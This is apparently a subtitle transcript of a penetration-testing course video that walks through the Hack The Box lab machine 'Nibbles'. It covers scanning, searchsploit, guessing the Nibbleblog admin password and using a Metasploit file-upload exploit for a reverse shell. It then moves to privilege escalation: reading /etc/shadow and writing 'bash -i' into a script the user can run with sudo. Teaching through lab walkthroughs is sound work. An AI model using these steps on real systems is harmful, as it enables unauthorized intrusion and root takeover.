1
00:00:00,120 --> 00:00:01,860
So welcome to walkthrough

2
00:00:01,860 --> 00:00:05,590
number six. We're really working on a machine called Nibbles.

3
00:00:05,670 --> 00:00:07,760
So Nibbles is at 10.10.

4
00:00:07,820 --> 00:00:08,340
10.

5
00:00:08,490 --> 00:00:11,670
75. It is a Linux machine.

6
00:00:12,120 --> 00:00:17,940
So go ahead and get your nmap scan started now, and we're going to be doing this for the last five

7
00:00:17,940 --> 00:00:19,300
videos of the course.

8
00:00:19,320 --> 00:00:25,260
So start your nmap scan now, and then go ahead and join when you are ready to go, when your nmap results

9
00:00:25,320 --> 00:00:26,250
are back.

10
00:00:26,250 --> 00:00:31,980
If you're just following along, that's absolutely OK. Just go ahead and let the video play through.

11
00:00:31,980 --> 00:00:35,030
If you're scanning, go ahead and join us when your scan is ready.

12
00:00:35,040 --> 00:00:37,360
I'll see you over when you're done.

13
00:00:37,380 --> 00:00:37,790
All right.

14
00:00:37,800 --> 00:00:44,670
Now on our Kali machine, taking a look at our nmap scan, we see that there are two ports that have returned.

15
00:00:44,670 --> 00:00:47,450
One is port 22, which is SSH.

16
00:00:47,460 --> 00:00:50,910
And the other is port 80, which is HTTP.

17
00:00:51,090 --> 00:00:53,640
Now in this scenario it's actually quite common.

18
00:00:53,640 --> 00:00:59,550
And we've talked about it in previous videos, where you see something like port 22 and port 80 and that's

19
00:00:59,550 --> 00:01:07,380
it. In this vector, especially on easy machines like this for capture the flag, typically port 80 is the

20
00:01:07,410 --> 00:01:14,250
way in, and port 22 would be utilized in some way later on. You might get a reverse shell on port

21
00:01:14,280 --> 00:01:21,660
80, you might find credentials on port 80, something here might lead us to a nice shell here later on.
22
00:01:21,660 --> 00:01:27,100
Typically the version of SSH is not the way in.

23
00:01:27,170 --> 00:01:31,960
There's not, like, usually RCEs or remote code execution on versions.

24
00:01:31,980 --> 00:01:35,990
So we could searchsploit OpenSSH and see if there's anything out there.

25
00:01:36,030 --> 00:01:41,600
My guess would be there isn't. On top of that, we see that there is Ubuntu running on the machine.

26
00:01:41,610 --> 00:01:46,130
So this would be useful information for us just during the information gathering process.

27
00:01:46,230 --> 00:01:51,060
So we'll store this in our back pocket and note that it's running Ubuntu on the back end.

28
00:01:51,060 --> 00:01:56,220
So we already know we're up against a Linux machine. On top of that, we can kind of tell we're against

29
00:01:56,220 --> 00:01:59,940
a Linux machine with the SSH and the Apache here.

30
00:01:59,940 --> 00:02:05,430
So again, Ubuntu showing here on this HTTP service.

31
00:02:05,550 --> 00:02:11,330
So a couple things that we can do is we can look for exploits against Apache as well.

32
00:02:11,700 --> 00:02:17,180
So for example, a tool that I haven't shown you but wanted to show you is a tool called searchsploit,

33
00:02:18,260 --> 00:02:22,950
so we could say hey, we've got Apache open and maybe we want to just quickly

34
00:02:22,970 --> 00:02:23,600
know,

35
00:02:23,600 --> 00:02:26,800
is there any kind of exploits for this 2.4.18?

36
00:02:27,290 --> 00:02:33,230
Well, we come down here and we can start typing in searchsploit and just go ahead and tab and autocomplete.

37
00:02:33,800 --> 00:02:38,990
Now the thing I will say about searchsploit is that you don't have to be very specific. If you're very

38
00:02:38,990 --> 00:02:40,490
specific with your query,

39
00:02:40,850 --> 00:02:42,980
it's actually worse off for you.
40
00:02:43,610 --> 00:02:48,620
And I'll show you an example. So if you say hey, I'm up against Apache 2.4.18,

41
00:02:50,000 --> 00:02:55,250
it's going to say I didn't find anything. But if we back that out a little bit and we say hey, we're against

42
00:02:55,250 --> 00:02:58,360
Apache 2.4, OK.

43
00:02:58,430 --> 00:03:04,040
Now some stuff starts showing up. When we get very version specific like this, we might actually miss

44
00:03:04,130 --> 00:03:10,490
some details in terms of exploits. As you can see here, there's an exploit right here from 2.4.

45
00:03:10,490 --> 00:03:15,830
17 to 2.4.38, and this 2.4.18 actually falls

46
00:03:15,830 --> 00:03:17,570
in line in here.

47
00:03:17,570 --> 00:03:23,520
So it's important to note that. Let's not be too specific if we use this searchsploit tool.

48
00:03:23,600 --> 00:03:29,150
Now what searchsploit is doing is it's pulling down from Exploit Database, which is actually already pulled

49
00:03:29,150 --> 00:03:35,000
down and updated on your machine, since Kali, the owners of Kali Linux, also run Exploit Database.

50
00:03:35,000 --> 00:03:40,550
They have a nice little repository of all the exploits that are on Exploit Database on your machine.

51
00:03:40,550 --> 00:03:46,460
So we're just doing an offline search here. We don't have to touch the web to do this search, and any

52
00:03:46,460 --> 00:03:49,870
exploit that has been pulled down is available on your machine.

53
00:03:49,880 --> 00:03:52,740
You can see we have a shell script here.

54
00:03:53,090 --> 00:03:59,230
If we see a .rb, for Ruby, that means Metasploit module most of the time, so we could see those

55
00:03:59,230 --> 00:04:00,290
things as well.

56
00:04:00,310 --> 00:04:05,010
And for example, on this exploit we can tell some other things as well.
57
00:04:05,140 --> 00:04:09,180
It's an exploit for Linux. That's good, that checks a box, but it's a local exploit.

58
00:04:09,190 --> 00:04:14,530
Meaning we have to be on the machine or somehow already have access to it.

59
00:04:14,530 --> 00:04:14,830
Right.

60
00:04:14,830 --> 00:04:16,470
To exploit this.

61
00:04:16,480 --> 00:04:17,880
So this isn't going to work for us.

62
00:04:17,930 --> 00:04:21,020
We're more after a remote exploit of some sort.

63
00:04:21,250 --> 00:04:26,530
And we're really not after any kind of denial of service exploits. Typically, especially in a real pen

64
00:04:26,530 --> 00:04:27,610
test, those are out of scope.

65
00:04:27,640 --> 00:04:34,110
But when we're talking about having a capture the flag like we're doing here, these are really out of scope.

66
00:04:34,150 --> 00:04:37,330
We don't want to deny service to our box. There's no point in doing that.

67
00:04:37,420 --> 00:04:42,790
Now say this was a 2.4.17 and we know it's vulnerable to denial of service on a

68
00:04:42,790 --> 00:04:43,360
report.

69
00:04:43,360 --> 00:04:44,790
We would actually write this up.

70
00:04:44,800 --> 00:04:46,480
We'd absolutely write it up.

71
00:04:46,480 --> 00:04:52,300
We would note hey, you know, this version is vulnerable to X, Y and Z, including denial of service, see these

72
00:04:52,750 --> 00:04:56,960
write-ups here as to what can happen if it was running on Windows.

73
00:04:57,130 --> 00:05:01,390
So let's go ahead and do a little bit of further enumeration.

74
00:05:01,390 --> 00:05:06,310
I don't think Apache 2.4.18 is actually the way in here.

75
00:05:06,400 --> 00:05:15,750
So if we go out to the interwebs and we just say 10.10.10.75 and we get

76
00:05:15,750 --> 00:05:18,010
a Hello World, OK.

77
00:05:18,020 --> 00:05:20,290
So not a lot to go on here.
78
00:05:20,330 --> 00:05:25,850
There are a few things that I always do when I first get to a web page, and I'm going to note that

79
00:05:25,850 --> 00:05:28,420
this box does teach valuable lessons.

80
00:05:28,430 --> 00:05:34,700
Again, we're starting to get off of the really, really easy machines, and this is still going to be easy.

81
00:05:34,700 --> 00:05:36,200
This is going to feel more

82
00:05:36,230 --> 00:05:41,150
capture the flag like than anything else that we've done so far, and that's OK.

83
00:05:41,160 --> 00:05:45,460
We're starting to get into some of these Hack The Box machines that are going to feel capture the flag,

84
00:05:45,890 --> 00:05:52,520
and our take on this is going to be that from a realistic perspective as much as we can do.

85
00:05:52,670 --> 00:05:57,920
But there are going to be some methods along the way that we're going to encounter that are going to

86
00:05:57,920 --> 00:06:02,720
be capture the flag. On top of that, there's going to be homework. I'm going to give you a good machine

87
00:06:02,930 --> 00:06:09,230
here towards the end that I think is going to allow us... I've skipped a couple machines that are really

88
00:06:09,230 --> 00:06:11,840
easy and kind of repetitive of what we've done.

89
00:06:12,050 --> 00:06:16,220
I'm going to give that as homework to allow us to test our knowledge and see where we need to fill in

90
00:06:16,220 --> 00:06:20,900
gaps, and then we'll do a quick review video for that here in the future.

91
00:06:20,900 --> 00:06:29,750
But I'll give that out towards the end of the video. So back into this session here, a few things that we

92
00:06:29,750 --> 00:06:36,240
can do from this point: we can go ahead and start up a Nikto scan and do some vulnerability scanning

93
00:06:36,240 --> 00:06:37,630
on this web page.
94
00:06:37,630 --> 00:06:43,330
We can take the directory here and do some directory busting, because if we do see this and this is all

95
00:06:43,330 --> 00:06:45,430
we have, we don't have any links or anything.

96
00:06:45,430 --> 00:06:47,510
Maybe there's something running on the back end of this.

97
00:06:47,530 --> 00:06:53,710
The server here, and we'll have to use directory busting to find that. On top of that, we can do some enumeration

98
00:06:53,710 --> 00:06:56,830
here if you have a tool called Wappalyzer.

99
00:06:56,890 --> 00:06:59,130
Now Wappalyzer is a great tool.

100
00:06:59,170 --> 00:07:02,070
You can see here that we've pulled down Apache and Ubuntu.

101
00:07:02,170 --> 00:07:07,630
If you don't have Wappalyzer installed, I do recommend just googling Wappalyzer here and installing

102
00:07:07,630 --> 00:07:11,530
this plugin for your Firefox. So from here,

103
00:07:11,540 --> 00:07:14,660
let's go ahead and just right click and view the source.

104
00:07:14,660 --> 00:07:20,250
I said this to you guys before, but again, especially in capture the flags they like to hide little comments

105
00:07:20,250 --> 00:07:21,590
in the source code.

106
00:07:21,620 --> 00:07:27,110
This is a realistic perspective in the sense that we should be looking for comments in source code

107
00:07:27,140 --> 00:07:28,350
by developers.

108
00:07:28,460 --> 00:07:33,050
We should be looking for hardcoded credentials and anything of value that might be in source code.

109
00:07:33,050 --> 00:07:38,030
So it's always important to look at the source code. As you can see here, there is a comment pointing

110
00:07:38,030 --> 00:07:40,580
to a nibbleblog directory.
111
00:07:40,780 --> 00:07:47,810
So what we're going to do is copy this and come over here, and I'm just going to type it out, but go into nibble

112
00:07:47,800 --> 00:07:55,730
blog, not the index page, just like this, and you'll see that we are given this nice little blog here. You

113
00:07:55,730 --> 00:07:56,450
can see Nibbles.

114
00:07:56,460 --> 00:07:57,710
Yum yum.

115
00:07:57,770 --> 00:08:01,910
And we've got that Hello World and not a whole lot of anything else.

116
00:08:01,910 --> 00:08:06,660
You've got some categories. We can click around, enumerate, see if there's anything here that we can do.

117
00:08:07,250 --> 00:08:09,420
And for the most part we are pretty stuck.

118
00:08:09,440 --> 00:08:17,140
We can view the source code and see if there's any information on this nibbleblog here, if we can see

119
00:08:17,140 --> 00:08:20,670
any kind of version or what it's running on with a platform.

120
00:08:20,980 --> 00:08:23,590
I'm not seeing anything right off the bat.

121
00:08:23,680 --> 00:08:28,030
We'll come back and also look at the Wappalyzer and see if there's anything of interest here.

122
00:08:28,060 --> 00:08:28,360
OK.

123
00:08:28,360 --> 00:08:29,050
It's running on

124
00:08:29,050 --> 00:08:29,590
jQuery.

125
00:08:29,590 --> 00:08:31,560
It's running on PHP.

126
00:08:31,690 --> 00:08:34,770
That may help us if we get some sort of exploit going for this.

127
00:08:35,230 --> 00:08:38,580
So in terms of what we see, there's nothing readily available.

128
00:08:38,590 --> 00:08:41,070
I don't have anything to exploit.

129
00:08:41,140 --> 00:08:47,250
So the next thing that we would do here is we would do a quick searchsploit on this.

130
00:08:47,380 --> 00:08:54,080
We can just say searchsploit. I can type in the panel here, searchsploit, and we'll do say something like

131
00:08:54,080 --> 00:08:56,970
nibbles, OK.

132
00:08:56,980 --> 00:08:57,580
That didn't work.

133
00:08:57,580 --> 00:08:59,380
How about nibble.
134
00:08:59,380 --> 00:09:01,820
See, I got too specific there.

135
00:09:01,850 --> 00:09:02,120
OK.

136
00:09:02,150 --> 00:09:08,070
So it is actually called Nibbleblog, and we can see that there's a couple of exploits out for it.

137
00:09:08,120 --> 00:09:15,570
One is a version 3 and it's got SQL injections on the web app, and then we've got a 4.0.

138
00:09:15,570 --> 00:09:22,100
3 that's very specific on an arbitrary file upload that allows remote code execution,

139
00:09:22,790 --> 00:09:27,720
and it's a .rb, which means that there is a Metasploit module available.

140
00:09:27,830 --> 00:09:30,920
So what's the difference between these two?

141
00:09:30,920 --> 00:09:34,010
Well, a SQL injection can lead to a shell.

142
00:09:34,120 --> 00:09:39,310
It can lead to database dumps, it can lead to a lot of malicious stuff, but not always.

143
00:09:39,350 --> 00:09:45,410
You could get SQL injection and not find anything of interest on the attack side.

144
00:09:45,410 --> 00:09:52,250
This thing here, this arbitrary file upload with remote code execution, way more juicy. Remote code execution

145
00:09:52,250 --> 00:09:57,950
means that we could be sitting at our house, exploit this and get code execution and talk back to us

146
00:09:57,980 --> 00:09:59,990
without ever having to be local.

147
00:09:59,990 --> 00:10:00,380
OK.

148
00:10:00,400 --> 00:10:06,060
So in terms of the nastier exploit, it's this all the way.

149
00:10:06,140 --> 00:10:11,840
Now we don't know what either of these do, but the one I would be eager to look at is this 4.0.

150
00:10:11,840 --> 00:10:12,620
3.

151
00:10:13,100 --> 00:10:17,540
So in order to do that, I'm just going to boot up Metasploit really quick, and we can actually load

152
00:10:17,540 --> 00:10:20,330
up that module and see a little bit more information.
153
00:10:20,360 --> 00:10:25,310
We could also go out to the web and do this to look at the file, and we could actually probably read

154
00:10:25,310 --> 00:10:27,530
the Ruby file and pull the information down.

155
00:10:27,530 --> 00:10:35,120
But just in a clear cut way, let's just search nibble real quick and then we'll just copy this guy here

156
00:10:36,190 --> 00:10:44,340
and say use, paste, and then all we have to do is type info.

157
00:10:46,100 --> 00:10:52,010
So from info we can see the description here. It says Nibbleblog contains a flaw that allows an authenticated

158
00:10:52,160 --> 00:10:57,380
remote attacker to execute arbitrary PHP code.

159
00:10:57,380 --> 00:11:00,170
This was tested on 4.0.3.

160
00:11:00,170 --> 00:11:03,740
We've got a blog about it here, we've got the details.

161
00:11:03,770 --> 00:11:04,890
Very interesting stuff.

162
00:11:04,910 --> 00:11:08,650
But if it says authenticated, that means we need to authenticate.

163
00:11:08,840 --> 00:11:13,250
That means there's probably some sort of login page somewhere.

164
00:11:13,280 --> 00:11:15,800
So what can we do here?

165
00:11:15,800 --> 00:11:20,180
Well, we don't see an admin panel or login page or anything.

166
00:11:20,240 --> 00:11:25,670
We could just type in admin and get lucky, which is what I did right off the bat.

167
00:11:25,670 --> 00:11:28,740
I just typed in admin on that page and found it.
168
00:11:28,760 --> 00:11:35,750
Now there are other methods to doing this as well. We could go into a new tab here and we could run something

169
00:11:35,750 --> 00:11:46,590
like a dirbuster, and in dirbuster we could copy this address here like this and just paste it

170
00:11:48,250 --> 00:11:55,310
and then add in the 80 at the end right here like this. Now my typical settings would be to say to go

171
00:11:55,310 --> 00:12:04,540
faster on this, and we can browse to our file and do something like base here, and then we're gonna go

172
00:12:04,540 --> 00:12:14,990
to usr, go to share and just start typing wordlists, so type in w o and you'll see wordlists comes

173
00:12:14,990 --> 00:12:22,960
up. Second, in here there is a dirbuster folder. I believe I've actually shown you guys this before, but

174
00:12:23,240 --> 00:12:29,270
doesn't hurt to show it again, and I always choose the medium list because I like to be as robust as

175
00:12:29,270 --> 00:12:37,480
possible. We can start with the nibbleblog directory, so we say nibbleblog here.

176
00:12:37,870 --> 00:12:40,940
I keep calling it Nibbles because that's the name of the machine, but definitely nibbleblog.

177
00:12:41,900 --> 00:12:44,160
And then we know it's a PHP extension.

178
00:12:44,270 --> 00:12:50,870
We could totally look for just PHP. If we wanted to look for more, we could say like txt, bak files,

179
00:12:51,350 --> 00:12:59,960
zip files, rar files, PDF, any kind of extension you want here. Just for the sake of purpose and time, say

180
00:12:59,990 --> 00:13:06,250
we're just going to search for PHP, and we'll go ahead and start that on the nibbleblog itself.

181
00:13:06,370 --> 00:13:09,580
Now it's already finding a ton of info.

182
00:13:09,580 --> 00:13:11,960
We go to the tree view. I like the tree view.

183
00:13:12,190 --> 00:13:15,910
You can see there is index, admin, install, update, sitemap.

184
00:13:16,800 --> 00:13:17,040
OK.
185
00:13:17,080 --> 00:13:22,590
So there's a lot of stuff here for this in particular.

186
00:13:22,670 --> 00:13:28,370
Now we found the admin area by just guessing the admin area, and if we did some research on the blog

187
00:13:28,400 --> 00:13:33,310
we probably could have found where the admin page was as well. We could say hey, Nibbleblog, where's

188
00:13:33,320 --> 00:13:35,620
the admin at, Nibbleblog admin.

189
00:13:35,630 --> 00:13:36,860
Right.

190
00:13:36,860 --> 00:13:42,530
So we see some interesting information, and you can see it's pulling down a ton of files through here

191
00:13:42,530 --> 00:13:43,370
as well.

192
00:13:43,520 --> 00:13:45,590
So I'm gonna go ahead and actually just stop this.

193
00:13:45,590 --> 00:13:47,850
We don't need to run this whole thing.

194
00:13:48,680 --> 00:13:52,970
So here's some things we can do. We're at the nibbleblog admin area.

195
00:13:53,000 --> 00:13:55,760
Now this won't have default credentials, right?

196
00:13:55,760 --> 00:13:58,160
This is somebody's personal blog.

197
00:13:58,520 --> 00:14:04,790
And in order to save time, what I'm going to do is talk through this process. What we could do is build out

198
00:14:04,790 --> 00:14:12,020
a brute force similar to the last episode, where we captured or intercepted here and we attempted to... we

199
00:14:12,020 --> 00:14:17,990
could use Burp Suite and an Intruder, right, and try to do a username and password, something along the

200
00:14:17,990 --> 00:14:26,380
lines of admin or administrator, and then use a common bad password list here and see if we can get in.
201
00:14:26,420 --> 00:14:34,220
We could also go to the nibbleblog page itself. If we just go back, let me delete this and we'll just

202
00:14:34,220 --> 00:14:40,740
go to nibbleblog, and we could come here, and if there were actual blog information we can use a tool

203
00:14:40,740 --> 00:14:48,060
something like cewl, C E W L, and try to pull down information. We could pull down words off of this list

204
00:14:48,570 --> 00:14:55,740
and we can say hey, what words do they use in their blog that maybe we can perhaps relate to them and

205
00:14:55,740 --> 00:15:01,410
use as a password. We don't need to do that here, there's not a lot, but if we look at some words on here,

206
00:15:01,530 --> 00:15:07,830
the password actually ends up being right here with nibbles, so nibbles is going to be our password. There's

207
00:15:07,830 --> 00:15:13,470
actually a timeout, I believe, if we enter in too many incorrect users and passwords, so we're not going to

208
00:15:13,470 --> 00:15:14,240
do that.

209
00:15:14,370 --> 00:15:21,360
And if you're interested in brute forcing with Burp Suite, episode 5, I believe, was the episode where

210
00:15:21,360 --> 00:15:25,380
we took brute forcing and we used Burp Suite to do that.

211
00:15:25,680 --> 00:15:32,530
So let's just go ahead and type in admin and then, lowercase, just type in nibbles, and you'll see that

212
00:15:32,530 --> 00:15:37,490
we get access to the page. So we have access.

213
00:15:37,500 --> 00:15:43,910
We need to determine if this is actually 4.0.3, because that's important, right?

214
00:15:43,920 --> 00:15:49,730
We need to know if this is the right version for us, so we can go into settings here.

215
00:15:49,740 --> 00:15:54,030
If you just click around, what you should be doing as well is enumerating this whole application.

216
00:15:54,210 --> 00:15:57,900
If you log into an application, you should be looking at what you can do.

217
00:15:57,900 --> 00:15:58,950
Can you upload?
218
00:15:58,950 --> 00:16:01,060
Can you be malicious?

219
00:16:01,290 --> 00:16:06,120
You can manage pages or settings, there's themes, there's all kinds of stuff in here, right?

220
00:16:06,120 --> 00:16:11,700
But if we come to the settings page here, on the first settings tab, and we scroll all the way down, you

221
00:16:11,700 --> 00:16:15,260
could see that we are running Nibbleblog 4.0.3.

222
00:16:15,270 --> 00:16:16,110
This is money.

223
00:16:16,110 --> 00:16:18,210
This is confirmed, right?

224
00:16:18,210 --> 00:16:19,500
We have what we need.

225
00:16:19,800 --> 00:16:21,690
We've got user credentials.

226
00:16:21,690 --> 00:16:24,710
We can effectively do this.

227
00:16:24,810 --> 00:16:26,250
So let's do this.

228
00:16:26,340 --> 00:16:28,870
Let's go back to our Metasploit that we had.

229
00:16:28,880 --> 00:16:32,470
I'm going to close out this dirbuster here. OK.

230
00:16:32,510 --> 00:16:36,050
So if we looked at our options, show options, with our info as well.

231
00:16:36,290 --> 00:16:38,580
So we need a password, required.

232
00:16:38,690 --> 00:16:40,160
We need a TARGETURI.

233
00:16:40,790 --> 00:16:41,240
OK.

234
00:16:41,240 --> 00:16:43,800
And we need a username.

235
00:16:44,170 --> 00:16:46,410
So we also need our RHOST.

236
00:16:46,490 --> 00:16:49,200
So we're gonna have to supply a few things here.

237
00:16:49,220 --> 00:16:55,270
Let's go ahead and set the password to nibbles.

238
00:16:55,460 --> 00:17:00,830
We'll set the username to admin. We'll set the,

239
00:17:00,830 --> 00:17:09,450
RHOST, is it host or hosts, RHOSTS, to 10.10.10.75.

240
00:17:10,150 --> 00:17:18,450
And I believe we're going to need to set the TARGETURI to admin.php, and I could be incorrect

241
00:17:18,450 --> 00:17:19,510
here, but we'll see.

242
00:17:22,500 --> 00:17:22,890
OK.

243
00:17:22,890 --> 00:17:26,340
Now let's show options again real quick.
244
00:17:28,020 --> 00:17:29,690
And we only have one target.

245
00:17:29,760 --> 00:17:31,070
This looks OK.

246
00:17:31,080 --> 00:17:33,330
Everything looks like we set it correctly.

247
00:17:33,330 --> 00:17:37,600
So let's go ahead and type run and see if that works. OK.

248
00:17:37,600 --> 00:17:45,550
So that didn't work, because I am dumb. If you notice, we're actually at nibbleblog/admin.

249
00:17:45,550 --> 00:17:47,530
So let's set the target

250
00:17:47,530 --> 00:17:53,810
URI to, let's just try nibbleblog first, and then I think it actually knows where the admin

251
00:17:53,870 --> 00:17:54,760
directory is.

252
00:17:55,150 --> 00:18:00,220
So let's just do /nibbleblog and then we'll run this.

253
00:18:00,220 --> 00:18:00,880
There we go.

254
00:18:00,920 --> 00:18:07,980
Now we've got a session, so you can see what it's doing is it's uploading a malicious image that's PHP.

255
00:18:07,990 --> 00:18:10,600
And if you want to see where that's happening at,

256
00:18:10,600 --> 00:18:18,610
we come into our settings here and go into plugins, and under plugins there's a My Image. If you actually

257
00:18:18,610 --> 00:18:23,560
go to configure here, you could see that we have the ability to upload an image.

258
00:18:23,560 --> 00:18:28,300
Now this image we're uploading is a .php. That should not be happening, right?

259
00:18:28,300 --> 00:18:34,580
We should have some sort of blacklisting going on, or whitelisting, on extensions that we want to run.

260
00:18:34,750 --> 00:18:39,490
But if we try to upload a PHP file, we're allowed to do so. Since we're allowed to do that, we can then

261
00:18:39,490 --> 00:18:44,750
call that PHP file, execute it and get a reverse shell on this system.

262
00:18:44,950 --> 00:18:47,640
So easy, easy breezy here.
263
00:18:47,650 --> 00:18:54,140
So now you've got a shell. We can do sysinfo and look at some information here, so this is good information

264
00:18:54,140 --> 00:18:55,240
off the bat.

265
00:18:55,400 --> 00:19:02,240
We can see that we've got a 4.4.0 Ubuntu, 104-generic.

266
00:19:02,240 --> 00:19:06,670
We always want to look for this for privilege escalation purposes.

267
00:19:06,740 --> 00:19:11,150
So if we're not the high level user, let's get our UID real quick.

268
00:19:11,150 --> 00:19:13,820
We're not a high level user, we're 1001 here.

269
00:19:13,820 --> 00:19:16,740
So you can see nibbler, we are not root.

270
00:19:17,150 --> 00:19:24,830
So we're going to need to do some privesc. One very, very nice thing to do is to just search the Ubuntu

271
00:19:24,830 --> 00:19:27,200
on this and look for privesc.

272
00:19:27,560 --> 00:19:29,420
That's one of the first steps we would do.

273
00:19:29,690 --> 00:19:36,530
But let me go ahead and get into the machine. We'll type shell, and let's look at the present working directory

274
00:19:36,530 --> 00:19:37,960
or print working directory.

275
00:19:38,450 --> 00:19:38,890
OK.

276
00:19:38,930 --> 00:19:44,570
Let's go into the home folder, and whoami.

277
00:19:44,570 --> 00:19:45,500
We are nibbler.

278
00:19:45,500 --> 00:19:53,860
Let's cd into nibbler and then let's just ls real quick, so let's ls -la.

279
00:19:53,880 --> 00:19:56,010
I see what's going on here.

280
00:19:56,290 --> 00:19:56,550
OK.

281
00:19:56,570 --> 00:20:01,130
So a couple of things. We can grab the user.txt file here.

282
00:20:01,320 --> 00:20:08,390
We also have the ability to type out, or sorry, cat the user.txt.

283
00:20:08,400 --> 00:20:13,000
We have the ability here to look at a few things.

284
00:20:13,000 --> 00:20:14,170
One that I always like to look at

285
00:20:14,190 --> 00:20:16,020
right off the bat is history.
286
00:20:16,670 --> 00:20:17,000
OK.

287
00:20:17,020 --> 00:20:18,440
The history command's not found.

288
00:20:18,440 --> 00:20:23,590
Now the history command would show us all the history that the user had typed previously.

289
00:20:23,590 --> 00:20:26,020
Now in this instance we don't have it.

290
00:20:26,020 --> 00:20:27,870
Command not found, that's fine.

291
00:20:28,030 --> 00:20:34,420
But for historical purposes, you never know if a user typed in a password or some sort

292
00:20:34,420 --> 00:20:35,690
of credentials there.

293
00:20:35,800 --> 00:20:38,200
I can't talk today, apparently.

294
00:20:38,560 --> 00:20:43,840
Another place to look, as you see that .bash_history, we could just cat .bash_history and see if

295
00:20:43,840 --> 00:20:44,950
there's anything there.

296
00:20:45,460 --> 00:20:47,930
And unfortunately there's not.

297
00:20:48,400 --> 00:20:51,010
So what can we do here?

298
00:20:51,010 --> 00:20:58,300
Well, another thing that I like to do before I go searching and hunting for privesc is I like to do a

299
00:20:58,300 --> 00:21:04,430
sudo -l, and this might take a second on this machine, as the machine's having a little bit of timeout

300
00:21:04,480 --> 00:21:05,530
issues.

301
00:21:05,590 --> 00:21:12,550
It could be with our outer shell that we have here since we don't have TTY interaction, but that's OK.

302
00:21:12,550 --> 00:21:15,350
Just give it a second.

303
00:21:16,240 --> 00:21:18,580
And once that happens we'll take a look.

304
00:21:18,580 --> 00:21:21,930
But so sudo -l is for no passwords.

305
00:21:22,030 --> 00:21:27,650
So if you don't know, sudo is running as an admin, or running a command with privileges,

306
00:21:27,660 --> 00:21:33,610
root or admin, and it requires a password to do that.
307
00:21:34,030 --> 00:21:39,730
So if you're not familiar with sudo, maybe go back and learn some more Linux and just get a little bit

308
00:21:39,730 --> 00:21:41,980
more familiar with the basics of Linux.

309
00:21:42,220 --> 00:21:45,580
Here we're able to run a command without a password.

310
00:21:45,610 --> 00:21:52,300
So if we wanted to do something, for example let's say cat /etc/shadow, we wanted to get the shadow file.

311
00:21:52,300 --> 00:21:53,760
Permission denied.

312
00:21:53,770 --> 00:21:56,040
Now we might be a member of the sudo group, right?

313
00:21:56,050 --> 00:22:02,830
And we could say sudo cat /etc/shadow, or sudo something, but we need to enter a password here and we

314
00:22:02,830 --> 00:22:03,600
don't know the password.

315
00:22:03,610 --> 00:22:05,300
We didn't get in with the password.

316
00:22:05,470 --> 00:22:11,590
So unless we stumble across the password or we figure out the password, then we're kind of stuck.

317
00:22:11,830 --> 00:22:17,200
But we have the ability to run something without a password here, and it's a monitor.sh in our

318
00:22:17,200 --> 00:22:19,560
personal/stuff folder.

319
00:22:19,960 --> 00:22:28,270
So we can ls -la again and you can see there is no personal or stuff folder, so there's gonna be

320
00:22:28,270 --> 00:22:30,340
no monitor.sh as well.

321
00:22:30,340 --> 00:22:36,760
What that means is we have the ability to create a shell script here in these folders and get malicious,

322
00:22:37,480 --> 00:22:41,020
but a couple things before we actually root this machine.

323
00:22:41,020 --> 00:22:43,810
So this one's pretty straightforward on what it can do.

324
00:22:43,810 --> 00:22:48,040
And I think the next video we're going to do is going to be somewhere around the sudo -l again, so

325
00:22:48,070 --> 00:22:52,330
you can see how these things sort of work and how we might have to do a little bit of investigative

326
00:22:52,330 --> 00:22:54,130
measures.
327
00:22:54,130 --> 00:22:58,050
So what we've got here is we've got some enumeration we could do.

328
00:22:58,050 --> 00:22:59,550
There's this personal.zip.

329
00:22:59,550 --> 00:23:04,510
And if in the back of your mind you're saying what's that personal.zip, perfect thought process, right?

330
00:23:04,540 --> 00:23:09,760
We should download this. In a perfect world, enumerate it, see what's in there, see if there's any password

331
00:23:09,760 --> 00:23:15,360
protections, try to crack those, etc. But just for the sake of time, so this video doesn't run too long,

332
00:23:15,370 --> 00:23:17,360
we're not gonna go down that rabbit hole.

333
00:23:17,770 --> 00:23:22,250
I'm going to show you the ways in. Now there are some good scripts out there.

334
00:23:22,270 --> 00:23:28,120
Say it wasn't this obvious to us, or there wasn't a sudo -l, and there's no history, and we search

335
00:23:28,150 --> 00:23:36,760
on the, we can type uname, uname -a, we search on the uname here and we look for this,

336
00:23:36,820 --> 00:23:42,640
this Ubuntu, and Google and say hey, privilege escalation on 4.4.0-104-

337
00:23:42,640 --> 00:23:45,040
generic, and nothing comes up.

338
00:23:45,740 --> 00:23:49,200
OK, that's another step that we could take. Are there any exploits for this?

339
00:23:49,380 --> 00:23:50,480
None of that comes up.

340
00:23:50,500 --> 00:23:55,240
Well, there are some great scripts out there, and I'm going to leave you to do your own research on this,

341
00:23:55,630 --> 00:24:06,630
but there is a script called LinEnum.sh. There is also a linuxprivchecker.py.

342
00:24:06,640 --> 00:24:14,260
Both of these are absolutely gold when it comes to enumerating Linux. Most Ubuntu Linux machines come

343
00:24:14,260 --> 00:24:20,630
with Python installed, and almost always they can run shell, right, so they can run these bash scripts.
344 00:24:20,650 --> 00:24:27,400 So with that being said maybe a challenge to you in this video is to go find these download them and 345 00:24:27,400 --> 00:24:29,860 then transfer the files onto these machines. 346 00:24:29,860 --> 00:24:31,130 How do we transfer the files. 347 00:24:31,130 --> 00:24:37,010 Well we'll do an example real quick and then I'll let you figure out how to run these and execute them. 348 00:24:37,060 --> 00:24:42,260 So we need to create a malicious file that will allow us to run as root. 349 00:24:42,260 --> 00:24:50,830 Here we have /home/nibbler we need to create a new folder called personal and we need to cd 350 00:24:50,830 --> 00:24:56,180 into that to make a new folder called stuff cd into stuff. 351 00:24:56,200 --> 00:25:00,070 And if we print the working directory OK we're there. 352 00:25:00,100 --> 00:25:04,120 So now we need to make a malicious file. 353 00:25:04,120 --> 00:25:04,760 Right. 354 00:25:04,810 --> 00:25:08,460 We've got a monitor.sh we can do. 355 00:25:08,650 --> 00:25:13,270 We can do a touch monitor.sh or we can do. 356 00:25:13,290 --> 00:25:16,250 We can actually just echo a command into there if we want. 357 00:25:16,290 --> 00:25:26,460 We could echo bash -i and we can just say put that into a monitor.sh something like this 358 00:25:27,180 --> 00:25:37,050 less and then you cat that monitor.sh and see that it just says bash -i I will explain 359 00:25:37,050 --> 00:25:37,850 this here in a second. 360 00:25:37,840 --> 00:25:39,750 Now I did say I was gonna do a file transfer. 361 00:25:39,750 --> 00:25:45,970 We could do the exact same thing with wget say we're over here and we we made that file. 362 00:25:45,990 --> 00:25:48,060 I'm just going to show you again. 363 00:25:48,060 --> 00:25:50,030 Say we all make it over here. 364 00:25:50,040 --> 00:26:00,940 Echo bash -i into monitor.sh and OK we should be able to cat monitor 
